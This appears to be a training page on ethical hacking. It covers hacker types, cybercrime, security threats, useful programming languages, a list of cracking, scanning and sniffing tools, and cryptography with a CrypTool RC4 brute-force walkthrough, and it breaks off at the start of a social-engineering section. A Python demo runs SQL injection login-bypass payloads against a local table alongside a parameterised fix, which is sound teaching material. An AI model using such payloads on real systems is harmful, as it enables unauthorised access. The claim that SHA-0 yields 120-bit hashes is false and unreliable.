Inplant And Internship Training Task List : Ethical Hacking - Inplant And Internship Training

 

what is Hacking? Introduction & Types

What is Hacking?

Hacking is identifying weaknesses in computer systems or networks and exploiting those weaknesses to gain access. Example of hacking: using a password-cracking tool to gain access to a system.

Computers have become essential to running a successful business. It is not enough to have isolated computer systems; they need to be networked to communicate with external businesses. This exposes them to the outside world and to hacking. In the criminal sense, hacking means using computers to commit fraudulent acts such as fraud, privacy invasion, theft of corporate or personal data, etc. Cyber crime costs many organizations millions of dollars every year. Businesses need to protect themselves against such attacks.


Before we go any further, let’s look at some of the most commonly used terminologies in the world of hacking.

 

Who is a Hacker? Types of Hackers

A hacker is a person who finds and exploits weaknesses in computer systems and/or networks to gain access. Hackers are usually skilled programmers with knowledge of computer security.

Hackers are classified according to the intent of their actions. The following list classifies hackers according to their intent.

Ethical hacker (white hat): A hacker who gains access to systems, with the owner's authorization, with a view to fixing the identified weaknesses. They may also perform penetration testing and vulnerability assessments.

Cracker (black hat): A hacker who gains unauthorized access to computer systems for personal gain. The intent is usually to steal corporate data, violate privacy rights, transfer funds from bank accounts, etc.

Grey hat: A hacker who is in between ethical and black hat hackers. He/she breaks into computer systems without authority with a view to identifying weaknesses and revealing them to the system owner.

Script kiddies: A non-skilled person who gains access to computer systems using ready-made tools.

Hacktivist: A hacker who uses hacking to send social, religious, political, etc. messages. This is usually done by hijacking websites and leaving the message on the hijacked website (defacement).

Phreaker: A hacker who identifies and exploits weaknesses in telephone systems instead of computers.

 

What is Cybercrime?

Cyber crime is the use of computers and networks to perform illegal activities such as spreading computer viruses, online bullying, performing unauthorized electronic fund transfers, etc. Most cybercrimes are committed through the internet. Some cybercrimes can also be carried out using mobile phones via SMS and online chat applications.

Types of Cybercrime

The following list presents the common types of cybercrimes:

  • Computer Fraud: Intentional deception for personal gain via the use of computer systems.

  • Privacy violation: Exposing personal information such as email addresses, phone number, account details, etc. on social media, websites, etc.

  • Identity Theft: Stealing personal information from somebody and impersonating that person.

  • Sharing copyrighted files/information: This involves distributing copyright protected files such as eBooks and computer programs etc.

  • Electronic funds transfer: This involves gaining an un-authorized access to bank computer networks and making illegal fund transfers.

  • Electronic money laundering: This involves the use of the computer to launder money.

  • ATM Fraud: This involves intercepting ATM card details such as the account number and PIN. These details are then used to withdraw funds from the victims' accounts.

  • Denial of Service Attacks: This involves the use of computers, often in multiple locations, to flood servers with requests with a view to shutting them down.

  • Spam: Sending unsolicited bulk emails. These emails usually contain advertisements.
     

What is Ethical Hacking?

Ethical hacking is identifying weaknesses in computer systems and/or computer networks and coming up with countermeasures that protect against those weaknesses. Ethical hackers must abide by the following rules.

  • Get written permission from the owner of the computer system and/or computer network before testing.

  • Protect the privacy of the organization being tested.

  • Transparently report all the identified weaknesses in the computer system to the organization.

  • Inform hardware and software vendors of the identified weaknesses.

Why Ethical Hacking?

  • Information is one of the most valuable assets of an organization. Keeping information secure can protect an organization’s image and save an organization a lot of money.

  • Hacking can lead to loss of business for organizations that deal in finance, such as PayPal. Ethical hacking puts them a step ahead of the cyber criminals who would otherwise cause that loss.

Legality of Ethical Hacking

Ethical hacking is legal if the hacker abides by the rules stipulated in the section above on the definition of ethical hacking, above all written authorization from the system owner. The International Council of E-Commerce Consultants (EC-Council) provides a certification program, the Certified Ethical Hacker (CEH), that tests an individual's skills. Those who pass the examination are awarded the certificate. The certificate has to be renewed periodically.

Summary

  • Hacking is identifying and exploiting weaknesses in computer systems and/or computer networks.

  • Cybercrime is committing a crime with the aid of computers and information technology infrastructure.

  • Ethical Hacking is about improving the security of computer systems and/or computer networks.

  • Ethical hacking is legal when it is carried out with the system owner's written authorization.

 

Potential Security Threats To Your Computer Systems

A computer system threat is anything that leads to loss or corruption of data or physical damage to the hardware and/or infrastructure. Knowing how to identify computer security threats is the first step in protecting computer systems. The threats could be intentional, accidental or caused by natural disasters.

In this article, we will introduce you to the common computer system threats and how you can protect systems against them.


What is a Security Threat?

A security threat is defined as a risk that can potentially harm computer systems and the organization. The cause could be physical, such as someone stealing a computer that contains vital data. The cause could also be non-physical, such as a virus attack. In this tutorial series, we will define a threat as a potential attack by a hacker that can allow them to gain unauthorized access to a computer system.

What are Physical Threats?

A physical threat is a potential cause of an incident that may result in loss or physical damage to the computer systems.

The following list classifies the physical threats into three main categories:

  • Internal: The threats include fire, unstable power supply, humidity in the rooms housing the hardware, etc.

  • External: These threats include Lightning, floods, earthquakes, etc.

  • Human: These threats include theft, vandalism of the infrastructure and/or hardware, disruption, accidental or intentional errors.

To protect computer systems from the above mentioned physical threats, an organization must have physical security control measures.

The following list shows some of the possible measures that can be taken:

  • Internal: Fire can be mitigated by the use of automatic fire detectors and extinguishers that do not use water to put out a fire (water destroys the hardware it is meant to save). An unstable power supply can be handled with voltage regulators. An air conditioner can be used to control the humidity in the computer room.

  • External: Lightning protection systems can be used to protect computer systems against lightning strikes. Lightning protection systems are not 100% effective, but to a certain extent they reduce the chances of lightning causing damage. Housing computer systems on high ground is one of the possible ways of protecting them against floods.

  • Humans: Threats such as theft can be prevented by use of locked doors and restricted access to computer rooms.

What are Non-physical threats?

A non-physical threat is a potential cause of an incident that may result in:

  • Loss or corruption of system data

  • Disruption of business operations that rely on computer systems

  • Loss of sensitive information

  • Illegal monitoring of activities on computer systems

  • Cyber security breaches

  • Others

The non-physical threats are also known as logical threats. The following list is the common types of non-physical threats;

  • Virus

  • Trojans

  • Worms

  • Spyware

  • Key loggers

  • Adware

  • Denial of Service Attacks

  • Distributed Denial of Service Attacks

  • Unauthorized access to computer systems resources such as data

  • Phishing

  • Other Computer Security Risks

To protect computer systems from the above-mentioned threats, an organization must have logical security measures in place. The following list shows some of the possible measures that can be taken to protect against these threats.

To protect against viruses, Trojans, worms, etc., an organization can use anti-virus software. In addition to anti-virus software, an organization can also control the use of external storage devices and restrict visits to websites that are likely to download unauthorized programs onto the user's computer.

Unauthorized access to computer system resources can be prevented by the use of authentication methods. The authentication methods can be in the form of user IDs and strong passwords, smart cards, biometrics, etc.

Intrusion-detection/prevention systems can be used to help protect against denial of service attacks. There are other measures too that can be put in place to mitigate denial of service attacks.

Summary

  • A threat is any activity that can lead to data loss or corruption, or to disruption of normal business operations.

  • There are physical and non-physical threats

  • Physical threats cause damage to computer systems hardware and infrastructure. Examples include theft, vandalism through to natural disasters.

  • Non-physical threats target the software and data on the computer systems.

Skills Required to Become an Ethical Hacker

Skills allow you to achieve your desired goals within the available time and resources. As a hacker, you will need to develop skills that will help you get the job done. These skills include learning how to program, using the internet effectively, being good at solving problems, and taking advantage of existing security tools.

In this article, we will introduce you to the common programming languages and skills that you must know as a hacker.


What is a programming language?

A programming language is a language that is used to develop computer programs. The programs developed can range from operating systems and database applications through to networking solutions.

Why should you learn how to program?

  • Hackers are problem solvers and tool builders; learning how to program will help you implement solutions to problems. It also differentiates you from script kiddies.

  • Writing programs as a hacker will help you to automate many tasks which would usually take a lot of time to complete.

  • Writing programs can also help you identify and exploit programming errors in the applications you are targeting.

  • You don’t have to reinvent the wheel all the time, and there are a number of open source programs that are readily usable. You can customize the already existing applications and add your methods to suit your needs.

What languages should I learn?

The answer to this question depends on your target computer systems and platforms. Some programming languages are used to develop for only specific platforms. As an example, Visual Basic Classic (3, 4, 5, and 6.0) is used to write applications that run on Windows operating system. It would, therefore, be illogical for you to learn how to program in Visual Basic 6.0 when your target is hacking Linux based systems.

Programming languages that are useful to hackers

1. HTML
   Description: language used to write web pages.
   Platform: cross platform*
   Purpose: web hacking
   Login forms and other data entry methods on the web use HTML forms to collect data. Being able to write and interpret HTML makes it easy for you to identify and exploit weaknesses in the code.

2. JavaScript
   Description: client-side scripting language.
   Platform: cross platform*
   Purpose: web hacking
   JavaScript code is executed in the client's browser. You can use it to read saved cookies, perform cross-site scripting (XSS), etc.

3. PHP
   Description: server-side scripting language.
   Platform: cross platform*
   Purpose: web hacking
   PHP is one of the most used web programming languages. It is used to process HTML forms and perform other custom tasks. You could write a custom application in PHP that modifies settings on a web server and makes the server vulnerable to attacks.

4. SQL
   Description: language used to communicate with databases.
   Platform: cross platform*
   Purpose: web hacking
   Using SQL injection you can bypass weak web application login logic, delete data from the database, etc.

5. Python, Ruby, Bash, Perl
   Description: high-level programming languages.
   Platform: cross platform*
   Purpose: building tools and scripts
   They come in handy when you need to develop automation tools and scripts. The knowledge gained can also be used to understand and customize the tools that are already available.

6. C and C++
   Description: high-level programming languages with low-level memory access.
   Platform: cross platform*
   Purpose: writing exploits, shellcode, etc.
   They come in handy when you need to write your own shellcode, exploits or rootkits, or to understand and extend existing ones.

7. Java, C#, Visual Basic, VBScript
   Description: other languages.
   Platform: Java and C# are cross platform*; Visual Basic and VBScript are specific to Windows.
   Purpose: other uses
   The usefulness of these languages depends on your scenario.

* Cross platform means programs developed using the particular language can be deployed on different operating systems such as Windows, Linux-based systems, macOS, etc.
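The SQL entry above says that injection can bypass a weak login check. As an added example written for this page (not code from the tutorial), the block below shows exactly that against a constructed in-memory SQLite table: a login that concatenates user input into the query text, beside the parameterised version that fixes it. The users, passwords and payloads are made up for the demonstration; storing plaintext passwords is itself bad practice and is done here only to keep the injection in focus.

```python
import sqlite3


def make_db():
    """Constructed demo table; in-memory so the example runs offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'S3cret!'), ('bob', 'hunter2')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Classic bug: user input becomes part of the SQL text, so quotes and comments change the query."""
    query = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterised query: the driver binds the values as data, they are never parsed as SQL."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(query, (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    # Legitimate use: both variants agree.
    print(login_vulnerable(db, "alice", "S3cret!"), login_safe(db, "alice", "S3cret!"))
    # Tautology payload: AND binds tighter than OR, so the WHERE clause is true for every row.
    tautology = "' OR '1'='1"
    print(login_vulnerable(db, "alice", tautology), login_safe(db, "alice", tautology))
    # Comment payload: everything after -- is ignored, so the password check disappears.
    print(login_vulnerable(db, "bob' --", "wrong"), login_safe(db, "bob' --", "wrong"))
```

With the vulnerable function, both payloads log in as a real user without the password; the parameterised version returns None for both because the quote and the comment marker are just characters inside a bound string.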

Other skills

In addition to programming skills, a good hacker should also have the following skills:

  • Know how to use the internet and search engines effectively to gather information.

  • Get a Linux-based operating system and know the basic commands that every Linux user should know.

  • Practice makes perfect, a good hacker should be hard working and positively contribute to the hacker community. He/she can contribute by developing open source programs, answering questions in hacking forums, etc.

Summary

  • Programming skills are essential to becoming an effective hacker.

  • Network skills are essential to becoming an effective hacker

  • SQL skills are essential to becoming an effective hacker.

  • Hacking tools are programs that simplify the process of identifying and exploiting weaknesses in computer systems.



Top 20 Tools for Ethical hacking in 2020

What are Hacking Tools?

Hacking tools are computer programs and scripts that help you find and exploit weaknesses in computer systems, web applications, servers and networks. There is a variety of such tools available on the market. Some of them are open source while others are commercial solutions.

 

In this list we highlight the leading tools for ethical hacking of web applications, servers and networks.

1) Netsparker

Netsparker is an easy to use web application security scanner that can automatically find SQL injection, XSS and other vulnerabilities in your web applications and web services. It is available as an on-premises and as a SaaS solution.

 

Features

  • Dead accurate vulnerability detection with the unique Proof-Based Scanning Technology.

  • Minimal configuration required. Scanner automatically detects URL rewrite rules, custom 404 error pages.

  • REST API for seamless integration with the SDLC, bug tracking systems etc.

  • Fully scalable solution. Scan 1,000 web applications in just 24 hours.


2) Acunetix

Acunetix is a fully automated ethical hacking solution that mimics a hacker to keep one step ahead of malicious intruders. The web application security scanner accurately scans HTML5, JavaScript and Single-page applications. It can audit complex, authenticated webapps and issues compliance and management reports on a wide range of web and network vulnerabilities.

Features:

  • Scans for all variants of SQL Injection, XSS, and 4500+ additional vulnerabilities

  • Detects over 1200 WordPress core, theme, and plugin vulnerabilities

  • Fast & Scalable – crawls hundreds of thousands of pages without interruptions

  • Integrates with popular WAFs and Issue Trackers to aid in the SDLC

  • Available On Premises and as a Cloud solution.


3) ImmuniWeb®

ImmuniWeb® AI Platform provides a full spectrum of Application Security Testing, Asset Discovery, Attack Surface Management, Dark Web Monitoring and Continuous Security Monitoring solutions tailored for DevSecOps.

With ImmuniWeb you get:

  • Reduced complexity and lower operations costs

  • Holistic visibility of your digital assets and risks

  • Priority-based and risk-aware testing

  • Full DevSecOps integration


4) SaferVPN

SaferVPN is a useful tool in an ethical hacker's arsenal. You may need it to check a target from different geographies, simulate non-personalized browsing behavior, anonymize file transfers, etc.

 

Features:

  • No-log VPN with high security and anonymity

  • Very fast speeds with 2000+ servers across continents

  • Based in Hong Kong, it does not store any data.

  • Split tunneling and 5 simultaneous logins

  • 24/7 support

  • Supports Windows, Mac, Android, Linux, iPhone, etc.

  • 300,000+ IPs

  • Port forwarding, dedicated IP and P2P protection

  • 31 Day Money-Back Guarantee


5) Burp Suite:

Burp Suite is a useful platform for performing Security Testing of web applications. Its various tools work seamlessly together to support the entire pen testing process. It spans from initial mapping to analysis of an application's attack surface.

Features:

  • It can detect over 3000 web application vulnerabilities.

  • Scan open-source software and custom-built applications

  • An easy to use Login Sequence Recorder allows the automatic scanning

  • Review vulnerability data with built-in vulnerability management.

  • Easily provide wide variety of technical and compliance reports

  • Detects Critical Vulnerabilities with 100% Accuracy

  • Automated crawl and scan

  • Advanced scanning feature for manual testers

  • Cutting-edge scanning logic

Download link: https://portswigger.net/burp/freedownload


6) Ettercap:

Ettercap is a comprehensive suite for man-in-the-middle attacks on a LAN. It supports active and passive dissection of many protocols and includes features for network and host analysis.

Features:

  • It supports active and passive dissection of many protocols

  • ARP poisoning to sniff on a switched LAN between two hosts

  • Characters can be injected into a server or to a client while maintaining a live connection

  • Ettercap is capable of sniffing an SSH connection in full duplex (SSH protocol version 1 only)

  • Allows sniffing of HTTP SSL secured data even when the connection is made using a proxy. This works by presenting the victim with a forged certificate, so any client that validates certificates will warn the user or refuse the connection.

  • Allows creation of custom plugins using Ettercap's API

Download link: https://ettercap.github.io/ettercap/downloads.html


7) Aircrack:

Aircrack-ng is a well-established suite for auditing wireless networks. It recovers the keys of vulnerable wireless networks protected with WEP or WPA/WPA2-PSK, given enough captured packets (for WEP) or a captured handshake (for WPA/WPA2).

Features:

  • More cards/drivers supported

  • Supports all major operating systems and platforms

  • WEP attack: PTW, which needs far fewer captured packets than the older FMS/KoreK attacks

  • Support for WEP dictionary attack

  • Support for fragmentation attack

  • Improved cracking speed

Download link: https://www.aircrack-ng.org/downloads.html


8) Angry IP Scanner:

Angry IP Scanner is an open-source, cross-platform network scanner. It scans IP addresses and ports.

Features:

  • Scans local networks as well as the Internet

  • Free and open-source tool

  • Scans a random range or a list of addresses read from a file in any format

  • Exports results into many formats

  • Extensible with many data fetchers

  • Provides command-line interface

  • Works on Windows, Mac, and Linux

  • No need for Installation

Download link: http://angryip.org/download/#windows


9) GFI LanGuard:

GFI LanGuard is a network security scanner that scans networks for vulnerabilities. It can act as your "virtual security consultant" on demand, and it builds an asset inventory of every device.

Features:

  • Change tracking: knowing which changes are affecting your network helps to maintain a secure network over time

  • Patch management: Fix vulnerabilities before an attack

  • Analyze network centrally

  • Discover security threats early

  • Reduce cost of ownership by centralizing vulnerability scanning

  • Help to maintain a secure and compliant network

Download link: https://www.gfi.com/products-and-solutions/network-security-solutions/gfi-languard/download


10) Savvius:

Savvius is a network analysis and forensics tool. It resolves performance issues and reduces security risk with the deep visibility provided by Omnipeek, and it can diagnose network issues faster and better with Savvius packet intelligence.

Features:

  • Powerful, easy-to-use network forensics software

  • Savvius automates the capture of the network data required to quickly investigate security alerts

  • Software and integrated appliance solutions

  • Packet intelligence combines deep analysis

  • Rapid resolution of network and security issues

  • Easy to use Intuitive workflow

  • Expert and responsive technical support

  • Onsite deployment for appliances

  • Commitment to our customers and our products

Download link: https://www.savvius.com/distributed_network_analysis_suite_trial


11) QualysGuard:

QualysGuard helps businesses streamline their security and compliance solutions and build security into their digital transformation initiatives. It can also check cloud systems for vulnerabilities.

Features:

  • It is trusted globally

  • No hardware to buy or manage

  • It is a scalable, end-to-end solution for all aspects of IT security

  • Vulnerability data securely stored and processed on an n-tiered architecture of load-balanced servers

  • Its sensors provide continuous visibility

  • Data analyzed in real time

  • It can respond to threats in a real-time

Download link: https://www.qualys.com/forms/freescan/


12) WebInspect:

WebInspect is an automated dynamic application security testing (DAST) tool that allows performing ethical hacking techniques. It provides comprehensive dynamic analysis of complex web applications and services.

Features:

  • Allows testing the dynamic behavior of running web applications to identify security vulnerabilities

  • Keep in control of your scan by getting relevant information and statistics at a glance

  • Centralized program management

  • Advanced technologies, such as simultaneous crawling, bring professional-level testing to novice security testers

  • Easily inform management on vulnerability trending, compliance management, and risk oversight

Download link: https://saas.hpe.com/en-us/software/webinspect


13) Hashcat:

Hashcat is a robust password cracking ethical hacking tool. It can help users to recover lost passwords, audit password security, or just find out what data is stored in a hash.

Features:

  • Open-Source platform

  • Multi-Platform Support

  • Allows utilizing multiple devices in the same system

  • Utilizing mixed device types in the same system

  • It supports distributed cracking networks

  • Supports interactive pause/resume

  • Supports sessions and restore

  • Built-in benchmarking system

  • Integrated thermal watchdog

  • Supports automatic performance tuning

Download link: https://hashcat.net/hashcat/


14) L0phtCrack:

L0phtCrack 6 is a password audit and recovery tool. It identifies and assesses password weaknesses on local machines and across networks.

Features:

  • Multicore and multi-GPU support helps to make the most of the hardware

  • Easy to customize

  • Simple password loading

  • Schedule sophisticated tasks for automated enterprise-wide password auditing

  • Fix weak password issues by forcing password resets or locking accounts

  • Audits passwords from multiple operating systems

Download link: http://www.l0phtcrack.com/#download-form


15) Rainbow Crack:

RainbowCrack is a password cracking tool widely used for ethical hacking. It cracks hashes with rainbow tables, using a time-memory trade-off algorithm for this purpose. Because the tables are precomputed per hash algorithm, it only works against unsalted hashes.

Features:

  • Full time-memory trade-off tool suite, including rainbow table generation

  • Supports rainbow tables for any hash algorithm

  • Supports rainbow tables for any character set

  • Supports rainbow tables in raw (.rt) and compact (.rtc) file formats

  • Multi-core processor support

  • GPU acceleration with multiple GPUs

  • Runs on Windows and Linux

  • Unified rainbow table file format on every supported OS

  • Command line user interface

  • Graphical user interface

Download link: http://project-rainbowcrack.com/index.htm


16) IKECrack:

IKECrack is an open source IKE/IPsec authentication cracking tool. It is designed to brute-force or dictionary-attack the pre-shared key used for IKE authentication.

Features:

  • Attacks pre-shared key (PSK) authentication in IKE aggressive mode

  • In aggressive mode the initiating client sends its encryption options proposal, DH public key, random number (nonce) and an ID in an unencrypted packet to the gateway/responder; the responder's hash over these values is derived from the PSK and can be captured and cracked offline

  • It is freely available for both personal and commercial use

Download link: http://ikecrack.sourceforge.net/


17) IronWASP:

IronWASP is an open source web application vulnerability testing tool. It is designed to be customizable so that users can create their own security scanners with it.

Features:

  • GUI based and very easy to use

  • It has a powerful and effective scanning engine

  • Supports recording of login sequences

  • Reporting in both HTML and RTF formats

  • Checks for over 25 types of web vulnerabilities

  • False Positives and Negatives detection support

  • It supports Python and Ruby

  • Extensible using plug-ins or modules in Python, Ruby, C# or VB.NET

Download link: http://ironwasp.org/download.html


18) Medusa

Medusa is a speedy, massively parallel, modular online brute-force password cracker. It is widely used in ethical hacking engagements to test network login services.

Features:

  • Designed to be a speedy, massively parallel, modular login brute-forcer

  • The main aim of this tool is to support as many services that allow remote authentication as possible

  • Allows thread-based parallel testing and brute-force testing

  • Flexible user input: targets, usernames and passwords can be specified in a variety of ways

  • Each service module exists as an independent .mod file

  • No modifications are needed to the core application to extend the supported list of services for brute-forcing

Download link: http://foofus.net/goons/jmk/medusa/medusa.html


19) NetStumbler

NetStumbler is used to detect wireless networks on the Windows platform.

Features:

  • Verifying network configurations

  • Finding locations with poor coverage in a WLAN

  • Detecting causes of wireless interference

  • Detecting unauthorized ("rogue") access points

  • Aiming directional antennas for long-haul WLAN links

Download link: http://www.stumbler.net/


20) SQLMap

SQLMap automates the process of detecting and exploiting SQL injection vulnerabilities. It is open source and cross platform. It supports the following database engines:

  • MySQL

  • Oracle

  • PostgreSQL

  • MS SQL Server

  • MS Access

  • IBM DB2

  • SQLite

  • Firebird

  • Sybase and SAP MaxDB

It supports the following SQL Injection Techniques;

  • Boolean-based blind

  • Time-based blind

  • Error-based

  • UNION query

  • Stacked queries and out-of-band.

Download link: http://sqlmap.org/


21) Cain & Abel

Cain & Abel is a password recovery tool for Microsoft operating systems. It is used to:

  • Recover MS Access passwords

  • Reveal passwords hidden behind asterisks in password fields

  • Sniff networks

  • Crack password hashes using dictionary attacks, brute-force, and cryptanalysis attacks.

Download link: http://www.softpedia.com/get/Security/Decrypting-Decoding/Cain-and-Abel.shtml


22) Nessus

Nessus can be used for:

  • Remote vulnerability scanning

  • Password dictionary attacks

  • Denial of service checks

It is closed source, cross platform and free for personal use.

Download link: http://www.tenable.com/products/nessus-vulnerability-scanner

 

 

Cryptography Tutorial: Cryptanalysis, RC4, CrypTool

Information plays a vital role in the running of businesses, organizations, military operations, etc. Information in the wrong hands can lead to loss of business or catastrophic results. To secure communication, a business can use cryptology to encipher information. Cryptology involves transforming information into a non-human-readable format and vice versa.

In this article, we will introduce you to the world of cryptology and how you can secure information from falling into the wrong hands.

What is Cryptography?

Cryptography is the study and application of techniques that hide the real meaning of information by transforming it into non-human-readable formats and vice versa.

Let's illustrate this with an example. Suppose you want to send the message "I LOVE APPLES"; you can replace every letter in the phrase with the letter three places further along the alphabet (wrapping from Z back to A). The encrypted message will be "L ORYH DSSOHV". To decrypt the message, go back three letters in the alphabet for each letter you want to decrypt. This is the Caesar cipher, and the shift (3) is its key.

The process of transforming information into non-human-readable form is called encryption.

The process of reversing encryption is called decryption.

Decryption is done using a secret key which is known only to the legitimate recipients of the information. The key is used to decrypt the hidden messages. This makes the communication secure because even if an attacker manages to intercept the information, it will not make sense to them.

The encrypted information is known as ciphertext.
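As an added, runnable illustration of the shift cipher used in the "I LOVE APPLES" example (example code written for this page, not part of the tutorial or of CrypTool): an encrypt/decrypt pair for the Caesar cipher, plus a crack() routine that exploits the fact that the key space has only 25 usable shifts. The crib word given to crack() is the analyst's assumption about a word that appears in the plaintext.

```python
import string

ALPHABET = string.ascii_uppercase


def caesar(text, shift):
    """Shift every letter by `shift` places modulo 26; spaces and punctuation are left as they are."""
    out = []
    for ch in text.upper():
        if ch in ALPHABET:
            out.append(ALPHABET[(ALPHABET.index(ch) + shift) % 26])
        else:
            out.append(ch)
    return "".join(out)


def encrypt(plaintext, shift=3):
    """'I LOVE APPLES' with the default shift of 3 becomes 'L ORYH DSSOHV'."""
    return caesar(plaintext, shift)


def decrypt(ciphertext, shift=3):
    """Undo the shift by moving the same number of places backwards."""
    return caesar(ciphertext, -shift)


def crack(ciphertext, crib):
    """Exhaustive key search: only 25 shifts exist, so try each and keep the one containing the crib."""
    for shift in range(1, 26):
        candidate = decrypt(ciphertext, shift)
        if crib.upper() in candidate:
            return shift, candidate
    return None


if __name__ == "__main__":
    ct = encrypt("I LOVE APPLES")
    print(ct)                      # L ORYH DSSOHV
    print(decrypt(ct))             # I LOVE APPLES
    print(crack(ct, "apples"))     # (3, 'I LOVE APPLES')
```

A key space of 25 is why a substitution by fixed shift offers no real security: the attacker does not need the key, only the patience to read 25 candidate decryptions.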

What is Cryptanalysis?

Cryptanalysis is the art of decrypting encrypted messages without the key that was used to encrypt them. Cryptanalysis uses mathematical analysis and algorithms to break ciphers. The success of a cryptanalysis attack depends on:

  • Amount of time available

  • Computing power available

  • Storage capacity available

The following is a list of the commonly used cryptanalysis attacks:

  • Brute force attack: tries every possible key (or, for a hash, every candidate plaintext), enciphering each candidate and comparing the result against the original ciphertext or hash.

  • Dictionary attack: uses a wordlist in order to find a match for either the plaintext or the key. It is mostly used when trying to crack hashed passwords.

  • Rainbow table attack: compares the hash against a precomputed table of hashes to find a match. It only works against unsalted hashes, since a per-user salt makes the precomputation useless.

What is cryptology?

Cryptology combines the techniques of cryptography and cryptanalysis.

Encryption Algorithms

  • MD5– this is the acronym for Message-Digest 5. It is used to create 128-bit hash values. Theoretically, hashes cannot be reversed into the original plain text. MD5 is used to hash passwords for storage as well as to check data integrity. MD5 is not collision resistant. Collision resistance is the difficulty of finding two inputs that produce the same hash value.

  • SHA– this is the acronym for Secure Hash Algorithm. SHA algorithms are used to generate condensed representations of a message (message digest). It has various versions such as;

      • SHA-0: produces 120-bit hash values. It was withdrawn from use due to significant flaws and replaced by SHA-1.

      • SHA-1: produces 160-bit hash values. It is similar to earlier versions of MD5. It has cryptographic weaknesses and has not been recommended for use since the year 2010.

      • SHA-2: it has two hash functions namely SHA-256 and SHA-512. SHA-256 uses 32-bit words while SHA-512 uses 64-bit words.

      • SHA-3: this algorithm was formerly known as Keccak.

  • RC4– this algorithm is used to create stream ciphers. It is mostly used in protocols such as Secure Socket Layer (SSL) to encrypt internet communication and Wired Equivalent Privacy (WEP) to secure wireless networks.

  • BLOWFISH– this algorithm is used to create keyed symmetric block ciphers. It can be used to encrypt passwords and other data.
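An added Python example (not code from the original tutorial) that ties the bit sizes in the list above to running code, using the standard hashlib module: it reports each algorithm's digest size, shows the avalanche effect that makes a digest useless for judging how similar two inputs are, and performs the integrity check the MD5 entry mentions. The input strings are constructed for the example.

```python
import hashlib
import hmac

# Algorithms from the list above, under the names hashlib uses for them.
ALGORITHMS = ("md5", "sha1", "sha256", "sha512", "sha3_256")


def digest_bits(algorithm):
    """Output size of a hash function in bits (128 for MD5, 160 for SHA-1, ...)."""
    return hashlib.new(algorithm).digest_size * 8


def hexdigest(algorithm, data: bytes):
    """Hex-encoded message digest of `data`."""
    return hashlib.new(algorithm, data).hexdigest()


def differing_bits(algorithm, a: bytes, b: bytes):
    """Number of output bits that differ between hash(a) and hash(b). For a
    sound hash about half the bits flip even when the inputs differ in one
    character (the avalanche effect), so a digest reveals nothing about how
    close two inputs are."""
    da = int.from_bytes(hashlib.new(algorithm, a).digest(), "big")
    db = int.from_bytes(hashlib.new(algorithm, b).digest(), "big")
    return bin(da ^ db).count("1")


def verify_integrity(algorithm, data: bytes, expected_hex):
    """Integrity check as used for downloads: recompute the digest and compare
    it with the published value. compare_digest avoids timing side channels."""
    return hmac.compare_digest(hexdigest(algorithm, data), expected_hex.lower())


if __name__ == "__main__":
    for name in ALGORITHMS:
        print(f"{name:9s} {digest_bits(name):4d} bits  {hexdigest(name, b'password')}")
    print("bits changed by a one-letter edit:",
          differing_bits("sha256", b"password", b"passwore"))
```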

Hacking Activity: Use CrypTool

In this practical scenario, we will create a simple cipher using the RC4 algorithm. We will then attempt to decrypt it using brute-force attack. For this exercise, let us assume that we know the encryption secret key is 24 bits. We will use this information to break the cipher.

We will use CrypTool 1 as our cryptology tool. CrypTool 1 is an open source educational tool for cryptological studies. You can download it from https://www.cryptool.org/en/ct1-downloads

Creating the RC4 stream cipher

We will encrypt the following phrase

Never underestimate the determination of a kid who is time-rich and cash-poor

We will use 00 00 00 as the encryption key.

  • Open CrypTool 1

  • Replace the text with Never underestimate the determination of a kid who is time-rich and cash-poor

  • Click on Encrypt/Decrypt menu

  • Point to Symmetric (modern) then select RC4 as shown above

  • The following window will appear

  • Select 24 bits as the encryption key

  • Set the value to 00 00 00

  • Click on Encrypt button

  • You will get the following stream cipher

Attacking the stream cipher

  • Click on Analysis menu

  • Point to Symmetric Encryption (modern) then select RC4 as shown above

  • You will get the following window

  • Remember the assumption made is that the secret key is 24 bits, so make sure you select 24 bits as the key length.

  • Click on the Start button. You will get the following window

  • Note: the time taken to complete the Brute-Force Analysis attack depends on the processing capacity of the machine being used and the key length. The longer the key length, the longer it takes to complete the attack.

  • When the analysis is complete, you will get the following results.

  • Note: the candidate with the lowest Entropy value is the most likely correct result, although a candidate with a higher Entropy value could also turn out to be the correct one.

  • Select the line that makes the most sense then click on the Accept selection button when done

Summary

  • Cryptography is the science of ciphering and deciphering messages.

  • A cipher is a message that has been transformed into a nonhuman readable format.

  • Deciphering is reversing a cipher into the original text.

  • Cryptanalysis is the art of deciphering ciphers without the knowledge of the key used to cipher them.

  • Cryptology combines the techniques of both cryptography and cryptanalysis

What is Social Engineering? Attacks, Techniques & Prevention

What is Social Engineering?

Social engineering is the art of manipulating users of a computing system into revealing confidential information that can be used to gain unauthorized access to a computer system. The term can also include activities such as exploiting human kindness, greed, and curiosity to gain access to restricted-access buildings or getting users to install backdoor software.

Knowing the tricks used by hackers to trick users into releasing vital login information, among others, is fundamental to protecting computer systems.

In this tutorial, we will introduce you to the common social engineering techniques and how you can come up with security measures to counter them.


How Social Engineering Works

A social engineering attack typically proceeds through the following stages:

  • Gather Information: This is the first stage; the attacker learns as much as he/she can about the intended victim. The information is gathered from company websites, other publications and sometimes by talking to the users of the target system.

  • Plan Attack: The attacker outlines how he/she intends to execute the attack.

  • Acquire Tools: These include computer programs that an attacker will use when launching the attack.

  • Attack: Exploit the weaknesses in the target system.

  • Use acquired knowledge: Information gathered during the social engineering tactics such as pet names, birthdates of the organization founders, etc. is used in attacks such as password guessing.

 

Common Social Engineering Techniques:

Social engineering techniques can take many forms. The following is the list of the commonly used techniques.

